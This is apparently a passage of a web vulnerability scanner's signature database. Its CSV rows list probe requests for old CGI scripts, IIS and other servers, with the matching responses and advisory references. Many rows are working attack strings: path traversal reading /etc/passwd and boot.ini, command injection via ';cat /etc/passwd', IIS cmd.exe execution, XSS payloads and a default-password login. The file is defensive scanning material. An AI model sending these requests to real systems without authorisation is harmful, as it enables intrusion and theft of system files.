c,generic,@CGIDIRS,shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|,"root:",GET,"ShopPlus Cart allows arbitrary command execution. CAN-2001-0992."
c,generic,@CGIDIRS,show.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,simple/view_page?mv_arg=|cat%20/etc/passwd|,"root:",GET,"This CGI allows attackers to execute commands on the host as the HTTP daemon owner."
c,generic,@CGIDIRS,sojourn.cgi?cat=../../../../../../../../../../etc/password%00,"root:",GET,"This CGI allows attackers to read arbitrary files."
c,generic,@CGIDIRS,spin_client.cgi?aaaaaaaa,200,GET,"This CGI may be vulnerable to remote execution by sending 8000 x 'a' characters (check to see if you get a 500 error message)"
c,generic,@CGIDIRS,ss,200,GET,"Mediahouse Statistics Server may allow attacker to execute remote commands. Upgrade to latest version or remove from the CGI directory."
c,generic,@CGIDIRS,sscd_suncourier.pl,200,GET,"Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done."
c,generic,@CGIDIRS,ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd,"root:",GET,"The server install allows reading of any system file by sending encoded '../' directives."
c,generic,@CGIDIRS,stat/,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,stats-bin-p/reports/index.html,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,stats.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,stats.prf,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,stats/,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,statsconfig,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,stats_old/,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,statview.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html,"root:",GET,"This CGI allows attackers to read arbitrary files remotely."
c,generic,@CGIDIRS,store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Agora.cgi is vulnerable to Cross Site Scripting (XSS), CAN-2001-1199, CA-2000-02."
c,generic,@CGIDIRS,store/agora.cgi?page=whatever33.html,"FILE:",GET,"Agora.cgi gives detailed error messages including file system paths."
c,generic,@CGIDIRS,story.pl?next=../../../../../../../../../../etc/passwd%00,"root:",GET,"story.pl versions older than 1.4 allow any file to be read remotely."
c,generic,@CGIDIRS,story/story.pl?next=../../../../../../../../../../etc/passwd%00,"root:",GET,"story.pl versions older than 1.4 allow any file to be read remotely."
c,generic,@CGIDIRS,survey,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,survey.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,sws/admin.html,"manager.pl",GET,"Stepweb.com SWS search engine admin page is available. You may be able to change admin information without authentication."
c,generic,@CGIDIRS,tablebuild.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1,200,GET,"Talkback CGI displays arbitrary files"
c,generic,@CGIDIRS,tcsh,200,GET,"Shell found in CGI dir!"
c,generic,@CGIDIRS,technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to read arbitrary files remotely."
c,generic,@CGIDIRS,test-cgi?/*,"/tmp",GET,"This CGI allows files to read remotely."
c,generic,@CGIDIRS,test.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,test/test.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,testcgi.exe,200,GET,"Sambar may be vulnerable to a DOS when a long string is passed to testcgi.exe (not attempted). Default CGI should be removed from web servers."
c,generic,@CGIDIRS,texis.exe/junk,"Web Script",GET,"Texis Web Script gives system path/information when an invalid file is requested."
c,generic,@CGIDIRS,texis/junk,"Web Script",GET,"Texis Web Script gives system path/information when an invalid file is requested."
c,generic,@CGIDIRS,textcounter.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,tidfinder.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,tigvote.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,title.cgi,200,GET,"HNS's title.cgi is vulnerable to cross site scripting (XSS CA-2000-02). in version 2.00 and earlier, and Lite 0.8 and earlier."
c,generic,@CGIDIRS,tpgnrock,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,traffic.cgi?cfg=../../../../../../../../etc/passwd,"root:",GET,"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version."
c,generic,@CGIDIRS,troops.cgi,200,GET,"This CGI may be a leftover from a hacked site; may be used to attempt to hack other sites.  It should be investigated further."
c,generic,@CGIDIRS,ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd,"root:",GET,"Tarantell TTAWeb Top CGI lets remote users read arbitrary files."
c,generic,@CGIDIRS,ultraboard.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,ultraboard.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,unlg1.1,200,GET,"web backdoor by ULG"
c,generic,@CGIDIRS,unlg1.2,200,GET,"web backdoor by ULG"
c,generic,@CGIDIRS,update.dpgs,200,GET,"Duma Photo Gallery System may allow remote users to write to any file on the system. See http://b0iler.eyeonsecurity.net for details. This could not be remotely tested."
c,generic,@CGIDIRS,upload.cgi,200,GET,"The upload.cgi allows attackers to upload arbitrary files to the server."
c,generic,@CGIDIRS,Upload.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to read arbitrary files remotely. CAN-2001-0466."
c,generic,@CGIDIRS,ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd,200,GET,"ustorekeeper will display arbitrary files. CAN-2001-0466"
c,generic,@CGIDIRS,view-source,200,GET,"This may allow remote arbitrary file retrieval."
c,generic,@CGIDIRS,view-source?view-source,200,GET,"This allows remote users to view source code."
c,generic,@CGIDIRS,viewlogs.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,viewsource?/etc/passwd,"root:",GET,"Allows attacker to retrieve arbitrary files.  Remove from CGI directory."
c,generic,@CGIDIRS,view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00,"root:",GET,"This CGI allows reading of remote files."
c,generic,@CGIDIRS,viralator.cgi,200,GET,"May be vulnerble to command injection, upgrade to 0.9pre2 or newer. This flaw could not be confirmed."
c,generic,@CGIDIRS,visadmin.exe,200,GET,"This CGI allows attacker to crash the web server. Remove it from the CGI directory."
c,generic,@CGIDIRS,visitor.exe,200,GET,"May be interesting..."
c,generic,@CGIDIRS,vote.cgi,200,GET,"Mike's Vote CGI contained a bug which allowed arbitrary command exectution (version 1.2), see http://freshmeat.net/projects/mikessurveycgi/"
c,generic,@CGIDIRS,vq/demos/respond.pl?<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. CA-2000-02."
c,generic,@CGIDIRS,VsSetCookie.exe?,200,GET,"A flaw in VsSetCookie.exe may allow attackers to guess a correct user name & gain access to the Lucent system. See http://www.securityfocus.com for more information."
c,generic,@CGIDIRS,w3-msql,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,w3-sql,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,way-board.cgi?db=/etc/passwd%00,"root:",GET,"Allows attackers to read arbitrary files from the server."
c,generic,@CGIDIRS,way-board/way-board.cgi?db=/etc/passwd%00,"root:",GET,"Allows attackers to read arbitrary files from the server."
c,generic,@CGIDIRS,wconsole.dll,200,GET,"It may be possible to overflow this dll with 1024 bytes of data."
c,generic,@CGIDIRS,webais,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,webbbs.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,webbbs.exe,200,GET,"May be interesting..."
c,generic,@CGIDIRS,webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd,"root:",GET,"WebBBS by Darryl Burgdorf is vulnerable to command execution."
c,generic,@CGIDIRS,webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD,"root:",GET,"webcart.cgi allows remote command execution. Upgrade to the latest version."
c,generic,@CGIDIRS,webdist.cgi?distloc=;cat%20/etc/passwd,"root:",GET,"This CGI allows attackers to read files remotely."
c,generic,@CGIDIRS,webdriver,200,GET,"This CGI often allows anyone to access the Informix DB on the host."
c,generic,@CGIDIRS,webgais,200,GET,"The webgais allows attackers to execute commands."
c,generic,@CGIDIRS,webif.cgi,200,GET,"HNS's webif.cgi is vulnerable to allow remote users to rewrite diary entries if 'direct mode' is enabled in version 2.00 and earlier, and Lite 0.8 and earlier."
c,generic,@CGIDIRS,webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00,"root:",GET,"EmuMail allows any file to be retrieved from the remote system."
c,generic,@CGIDIRS,webmap.cgi,200,GET,"nmap front end...could be fun"
c,generic,@CGIDIRS,Webnews.exe,200,GET,"Some versions of WebNews are vulnerable to a buffer overflow. See http://www.nextgenss.com/advisories/netwinnews.txt for more info."
c,generic,@CGIDIRS,webnews.pl,200,GET,"WebNews may contain some default users in the binary: testweb/newstest, alwn3845/imaptest, alwi3845/wtest3452, testweb2/wtest4879"
c,generic,@CGIDIRS,webplus.exe?about,"Product Information",GET,"Webplus may divulge product information, including version numbers. Version 4.X and below have a file read vulnerability. Vers prior to 4.6 build 561 and 5.0 build 554 have a buffer overflow."
c,generic,@CGIDIRS,webplus?about,"Product Information",GET,"Webplus may divulge product information, including version numbers. Version 4.X and below have a file read vulnerability."
c,generic,@CGIDIRS,webplus?script=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to retrieve files remotely."
c,generic,@CGIDIRS,websendmail,200,GET,"This CGI may allow attackers to execute arbitrary commands remotely."
c,generic,@CGIDIRS,webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to read arbitrary files."
c,generic,@CGIDIRS,webutil.pl,200,GET,"This might be interesting... has been seen in web logs from another CGI scanner."
c,generic,@CGIDIRS,webutils.pl,200,GET,"This might be interesting... has been seen in web logs from another CGI scanner."
c,generic,@CGIDIRS,webwho.pl,200,GET,"This might be interesting... has been seen in web logs from another CGI scanner." 
c,generic,@CGIDIRS,wguest.exe,200,GET,"May be interesting..."
c,generic,@CGIDIRS,whois.cgi?action=load&whois=%3Bid,"uid=",GET,"This script allows commands to be executed remotely."
c,generic,@CGIDIRS,whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd,"root:",GET,"The whois.cgi allows any command to be executed on the system."
c,generic,@CGIDIRS,whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd,"root:",GET,"The whois.cgi allows any command to be executed on the system."
c,generic,@CGIDIRS,whois_raw.cgi?fqdn=%0Acat%20/etc/passwd,"root:",GET,"Allows attacker to view any file (and possibly execute commands). Upgrade to latest version"
c,generic,@CGIDIRS,windmail,200,GET,"Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file"
c,generic,@CGIDIRS,windmail.exe,200,GET,"Some versions are vulnerable. Request 'windmail.exe?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file"
c,generic,@CGIDIRS,WINDMAIL.EXE?%20-n%20c:\boot.ini%,"boot loader",GET,"WINDMAIL.EXE can read arbitrary files"
c,generic,@CGIDIRS,WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\,200,GET,"WINDMAIL.EXE can read arbitrary files"
c,generic,@CGIDIRS,wrap,200,GET,"This CGI lets users read any file with 755 perms. It should not be in the CGI directory."
c,generic,@CGIDIRS,wrap.cgi,200,GET,"possible variation: comes with IRIX 6.2; allows to view directories"
c,generic,@CGIDIRS,WS_FTP.ini,200,GET,"Can contain saved passwords for ftp sites"
c,generic,@CGIDIRS,ws_ftp.ini,200,GET,"Can contain saved passwords for ftp sites"
c,generic,@CGIDIRS,www-sql,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,wwwadmin.pl,200,GET,"Administration CGI?"
c,generic,@CGIDIRS,wwwboard.cgi.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,wwwboard.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,wwwstats.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,wwwthreads/3tvars.pm,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,wwwthreads/w3tvars.pm,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,wwwwais,"UNISYS WEB SEARCH ENGINE",GET,"Unisys web server wais search found."
c,generic,@CGIDIRS,wwwwais,200,GET,"wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage."
c,generic,@CGIDIRS,YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00,"root:",GET,"This CGI lets users read any file with http daemon's permissions. Upgrade to latest version"
c,generic,@CGIDIRS,YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,zml.cgi?file=../../../../../../../../../../etc/passwd%00,"root:",GET,"Ztreet Markup Language interpreter allows arbitrary file to be read remotely."
c,generic,@CGIDIRS,zsh,200,GET,"Shell found in CGI dir!"
c,goaheadwebs,/,..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini,"boot loader",GET,"GoAhead Web Server 2.1 is vulnerable to arbitrary file retrieval, upgrade to the latest version."
c,goaheadwebs,/,<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"GoAhead Web Server 2.1 is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,goaheadwebs,/,goform/CheckLogin?login=root&password=tslinux,"MainPageTable",GET,"The Cyclades' web user 'root' still has the default password 'tslinux' set, this should be changed immediately. Also, the id/password is hashed to create the sessionId cookie, which is bad."
c,icecast,/,file/../../../../../../../../etc/,200,GET,"The Icecast server allows the file system to be probed for directory structure, but does not allow arbitrary file retrieval."
c,iis,/,"<script>alert('Vulnerable')</script>.shtm","<script>alert('Vulnerable')</script>.shtml",GET,"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,iis,/,"<script>alert('Vulnerable')</script>.stm","<script>alert('Vulnerable')</script>.shtml",GET,"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,iis,/,"readme.eml",200,GET,"Remote server may be infected with the Nimda virus."
c,iis,/,................../config.sys,200,GET,"PWS allows files to be read by prepending multiple '.' characters.  At worst, IIS, not PWS, should be used."
c,iis,/,../../../../../../../../../boot.ini,"boot loader",GET,"The remote server allows any system file to be retrieved remotely."
c,iis,/,..\\..\\..\\..\\..\\..\\..\\boot.ini,"boot loader",GET,"It is possible to read files on the server by adding /../ in front of file name."
c,iis,/,?\"><script>alert('Vulnerable');</script>,<script>alert('Vulnerable')</script>,GET,"IIS is vulnerable to Cross Site Scripting (XSS). See MS02-018, CVE-2002-0075, SNS-49, CA-2002-09"
c,iis,/,adsamples/config/site.csc,200,GET,"This might be interesting..."
c,iis,/,advworks/equipment/catalog_type.asp,200,GET,"Just found this file..."
c,iis,/,blahb.ida,200,GET,"Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings."
c,iis,/,blahb.idq,200,GET,"Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings."
c,iis,/,carbo.dll,200,GET,"This might be interesting..."
c,iis,/,global.asa,"RUNAT",GET,"The global.asa file was retrieved, which may contain sensitive information.  Map the .asa extension to the proper dll."
c,iis,/,iisadmin/,200,GET,"Access to /iisadmin should be restricted to localhost or allowed hosts only."
c,iis,/,iisadmpwd/aexp2.htr,200,GET,"Gives domain and system name, may allow an attacker to brute force for access."
c,iis,/,iisadmpwd/aexp2b.htr,200,GET,"Gives domain and system name, may allow an attacker to brute force for access."
c,iis,/,iisadmpwd/aexp3.htr,200,GET,"Gives domain and system name, may allow an attacker to brute force for access."
c,iis,/,iisadmpwd/aexp4.htr,200,GET,"Gives domain and system name, may allow an attacker to brute force for access."
c,iis,/,iisadmpwd/aexp4b.htr,200,GET,"Gives domain and system name, may allow an attacker to brute force for access."
c,iis,/,JUNK(10),"SecureIIS application",GET,"Server appears to be running eEye's SecureIIS application, http://www.eeye.com/."
c,iis,/,JUNK(10)abcd.html,"escape",GET,"The IIS server may be vulnerable to Cross Site Scripting (XSS) in error messages, see MS02-018, CVE-2002-0075, SNS-49, MS02-018, CA-2002-09" 
c,iis,/,nul..cfm,"The template specification",GET,"ColdFusion 4.0-5.0 reveal file system paths when requesting invalid DOS devices. CVE-2002-0576, KPMG-2002013, Macromedia MPSB02-01, BID-4542."
c,iis,/,nul..dbm,"The template specification",GET,"ColdFusion 4.0-5.0 reveal file system paths when requesting invalid DOS devices. CVE-2002-0576, KPMG-2002013, Macromedia MPSB02-01, BID-4542."
c,iis,/,nul.cfm,"The requested file",GET,"ColdFusion 4.0-5.0 reveal file system paths when requesting invalid DOS devices. CVE-2002-0576, KPMG-2002013, Macromedia MPSB02-01, BID-4542."
c,iis,/,nul.dbm,"The requested file",GET,"ColdFusion 4.0-5.0 reveal file system paths when requesting invalid DOS devices. CVE-2002-0576, KPMG-2002013, Macromedia MPSB02-01, BID-4542."
c,iis,/,null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full,"&lt;html&gt;",GET,"It is possible to retrieve the source of .asp files or view any file on the system. Install Webhits patch. MS00-006, CVE-2000-0097."
c,iis,/,NULL.printer,"Error in web printer install",GET,"Buffer overflow in Internet Printing ISAPI extension in Windows 2000 allows remote attackers to gain admin privileges via a long print request that is passed to the extension through IIS 5.0. EEYE-AD20010501, CVE-2001-0241, MS01-023, CA-2001-10, BID 2674"
c,iis,/,prd.i/pgen/,200,GET,"has MS Merchant Server 1.0"
c,iis,/,query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini,"[fonts]",GET,"This allows arbitrary files to be retrieved from the server."
c,iis,/,sam,200,GET,"This might be interesting..."
c,iis,/,sam.bin,200,GET,"This might be interesting..."
c,iis,/,sam._,200,GET,"This might be interesting..."
c,iis,/,samples/search/queryhit.htm,200,GET,"This might be interesting..."
c,iis,/,SQLQHit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings."
c,iis,/,sqlqhit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings."
c,iis,/,trace.axd,"Application Trace",GET,"The .NET IIS server has application tracing enabled. This could allow an attacker to view the last 50 web requests."
c,iis,/,upload.asp,200,GET,"An ASPpage that allows attackers to upload files to server"
c,iis,/,uploadn.asp,200,GET,"An ASPpage that allows attackers to upload files to server"
c,iis,/,uploadx.asp,200,GET,"An ASPpage that allows attackers to upload files to server"
c,iis,/,wa.exe,200,GET,"An ASPpage that allows attackers to upload files to server"
c,iis,/,whatever.htr,"<html>Error: The requested file could not be found. </html>",GET,"Reveals physical path. htr files may also be vulnerabe to an off-by-one overflow that allows remote command execution (see MS02-018)"
c,iis,/,whatever.htr,200,GET,"Reveals physical path. htr files may also be vulnerabe to an off-by-one overflow that allows remote command execution (see MS02-018)"
c,iis,/../../../../winnt/repair/,sam._,200,GET,"Sam backup successfully retrieved."
c,iis,/admentor/admin,admin.asp,200,GET,"Version 2.11 of AdMentor is vulnerable to SQL injection during login, in the style of: ' or ="
c,iis,/admin/,adminproc.asp,200,GET,"Xpede administration page may be available. The /admin directory should be protected."
c,iis,/admin/,datasource.asp,200,GET,"Xpede administration page may be available (this page reveals SQL account name). The /admin directory should be protected."
c,iis,/asp/,SQLQHit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings."
c,iis,/asp/,sqlqhit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings."
c,iis,/c/winnt/system32/,cmd.exe?/c+dir+/OG,"Directory of C",GET,"This machine is infected with Code Red, or has Code Red leftovers."
c,iis,/cgi-bin/,snorkerz.bat,200,GET,"Arguments passed to DOS CGI without checking"
c,iis,/cgi-bin/,snorkerz.cmd,200,GET,"Arguments passed to DOS CGI without checking"
c,iis,/cgi-win/,uploader.exe,200,GET,"This CGI allows attackers to upload files to the server and then execute them."
c,iis,/clocktower,/,200,GET,"Site Server sample files.  This might be interresting."
c,iis,/contents/extensions/asp/,1,200,GET,"The IIS system may be vulnerable to a DOS, see MS02-018 for details."
c,iis,/exchange/,root.asp?acs=anon,/exchange/logonfrm.asp,GET,"This allows anonymous access to portions of the OWA server. http://support.microsoft.com/support/exchange/content/whitepapers/owaguide.doc"
c,iis,/exchange/lib/,AMPROPS.INC,"Logon functions",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/"
c,iis,/exchange/lib/,ATTACH.INC,"File upload",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/"
c,iis,/exchange/lib/,DELETE.INC,"deleting objects",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/"
c,iis,/exchange/lib/,GETREND.INC,"GetRenderer functions",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/"
c,iis,/exchange/lib/,GETWHEN.INC,"functions to construct",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/"
c,iis,/exchange/lib/,JSATTACH.INC,"Attachment Javascript",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/"
c,iis,/exchange/lib/,JSROOT.INC,"Javascript Functions",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/"
c,iis,/exchange/lib/,JSUTIL.INC,"Common Javascript",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/"
c,iis,/exchange/lib/,LANG.INC,"localized strings",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/"
c,iis,/exchange/lib/,logon.inc,"Logon functions",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/"
c,iis,/exchange/lib/,PAGEUTIL.INC,"functions that help",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/"
c,iis,/exchange/lib/,PUBFLD.INC,"Anonymous Published",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/"
c,iis,/exchange/lib/,RENDER.INC,"Rendering functions",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/"
c,iis,/exchange/lib/,SESSION.INC,"Session Management",GET,"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/"
c,iis,/iissamples/,exair/howitworks/Code.asp,200,GET,"This might be interesting..."
c,iis,/iissamples/,exair/howitworks/Codebrw1.asp,200,GET,"This is a default IIS script/file which should be  removed."
c,iis,/iissamples/,sdk/asp/docs/codebrw2.asp,200,GET,"This is a default IIS script/file which should be  removed."
c,iis,/iissamples/,sdk/asp/docs/codebrws.asp,200,GET,"This is a default IIS script/file which should be  removed."
c,iis,/iissamples/exair/howitworks/,codebrws.asp,"ASP Source code browser",GET,"This is a default IIS script/file which should be  removed."
c,iis,/iissamples/exair/search/,advsearch.asp,200,GET,"This can be used to DoS IIS"
c,iis,/iissamples/exair/search/,query.asp,200,GET,"This can be used to DoS IIS"
c,iis,/iissamples/exair/search/,query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini,"[fonts]",GET,"This allows arbitrary files to be retrieved from the server."
c,iis,/iissamples/exair/search/,search.asp,200,GET,"This can be used to DoS IIS"
c,iis,/iissamples/exair/search/,search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini,"[fonts]",GET,"This allows arbitrary files to be retrieved from the server."
c,iis,/iissamples/issamples/,codebrws.asp,"Sample ASP Search Form",GET,"This is a default IIS script/file which should be  removed."
c,iis,/iissamples/issamples/,fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini,"[fonts]",GET,"This allows arbitrary files to be retrieved from the server."
c,iis,/iissamples/issamples/,query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini,"[fonts]",GET,"This allows arbitrary files to be retrieved from the server."
c,iis,/iissamples/issamples/,SQLQHit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings."
c,iis,/iissamples/issamples/,sqlqhit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings."
c,iis,/iissamples/issamples/oop/,qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full,"This is the formatting page for webhits full highlighting",GET,"This is a default IIS script/file which should be  removed."
c,iis,/iissamples/issamples/oop/,qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full,"This is the formatting page for webhits summary highlighting.",GET,"This is a default IIS script/file which should be  removed."
c,iis,/iissamples/sdk/asp/docs/,codebrws.asp,"View Active Server Page Source",GET,"IIS 5 comes with an ASP that allows remote code to viewed. All default files in /IISSamples should be removed."
c,iis,/iissamples/sdk/asp/docs/,CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp,"Path not found",GET,"CodeBrws.asp can be used to determine if a file system path exists or not."
c,iis,/iissamples/sdk/asp/docs/,CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp,200,GET,"IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root."
c,iis,/isapi/,tstisapi.dll,"Pi3web",GET,"The test tstisapi.dll is available and can allow attackers to execute commands remotely."
c,iis,/ISSamples/,SQLQHit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings."
c,iis,/ISSamples/,sqlqhit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings."
c,iis,/market,/,200,GET,"Site Server sample files.  This might be interresting."
c,iis,/msadc/,"..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c",[winnt],GET,"Can issue arbitrary commands to host."
c,iis,/msadc/,msadcs.dll,200,GET,"See RDS advisory, RFP9902 (wiretrip.net), CVE-1999-1011, MS98-004, MS99-025, CIAC:J-054, ISS 19990809, BID-529"
c,iis,/msadc/,samples/adctest.asp,200,GET,"This may allow remote code execution on the server."
c,iis,/msadc/Samples/selector/,showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini,"[fonts]",GET,"This allows attackers to read arbitrary files on the host."
c,iis,/mspress30,/,200,GET,"Site Server sample files.  This might be interresting."
c,iis,/oc/Search/,SQLQHit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings."
c,iis,/oc/Search/,sqlqhit.asp,"CHARACTERIZATION",GET,"This sample ASP allows anyone to retrieve directory listings."
c,iis,/ows-bin/,oaskill.exe?abcde.exe,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,iis,/ows-bin/,oasnetconf.exe?-l%20-s%20BlahBlah,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,iis,/pbserver/,pbserver.dll,200,GET,"This may contain a buffer overflow. http://www.microsoft.com/technet/security/bulletin/ms00-094.asp"
c,iis,/prxdocs/misc/,prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini,"[fonts]",GET,"This allows arbitrary files to be retrieved from the server."
c,iis,/scripts,/proxy/w3proxy.dll,502,GET,"MSProxy v1.0 installed"
c,iis,/scripts/,"..%255c..%255cwinnt/system32/cmd.exe?/c+ver","[Version]",GET,"IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CAN-2001-0333. BID-2708."
c,iis,/scripts/,"..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\","boot.ini",GET,"IIS Unicode command exec problem, see http://www.wiretrip.net/rfp/p/doc.asp?id=57&face=2 and http://www.securitybugware.org/NT/1422.html. CVE-2000-0884"
c,iis,/scripts/,counter.exe,200,GET,"This might be interesting..."
c,iis,/scripts/,cphost.dll,200,GET,"This might be interresting"
c,iis,/scripts/,cpshost.dll,200,GET,"posting acceptor...possibly allows you to upload files"
c,iis,/scripts/,fpadmcgi.exe,200,GET,"This might be interesting..."
c,iis,/scripts/,iisadmin/ism.dll,200,GET,"allows you to mount a brute force attack on passwords"
c,iis,/scripts/,no-such-file.pl,"perl script",GET,"Using perl.exe allows attacker to view host info. Use perlis.dll instead."
c,iis,/scripts/,postinfo.asp,200,GET,"This might be interesting..."
c,iis,/scripts/,repost.asp,"Here is your upload status",GET,"This allows uploads to /users. Create /users and give web user read only access."
c,iis,/scripts/,root.exe?/c+dir+c:\+/OG,"Directory of C",GET,"This machine is infected with Code Red, or has Code Red leftovers."
c,iis,/scripts/,samples/ctguestb.idc,200,GET,"This might be interesting..."
c,iis,/scripts/,samples/details.idc,200,GET,"See RFP 9901; www.wiretrip.net"
c,iis,/scripts/,samples/search/webhits.exe,200,GET,"This might be interesting..."
c,iis,/scripts/,tools/getdrvrs.exe,200,GET,"This can be used to make DSNs, useful in use with an ODBC exploit and the RDS exploit (with msadcs.dll)"
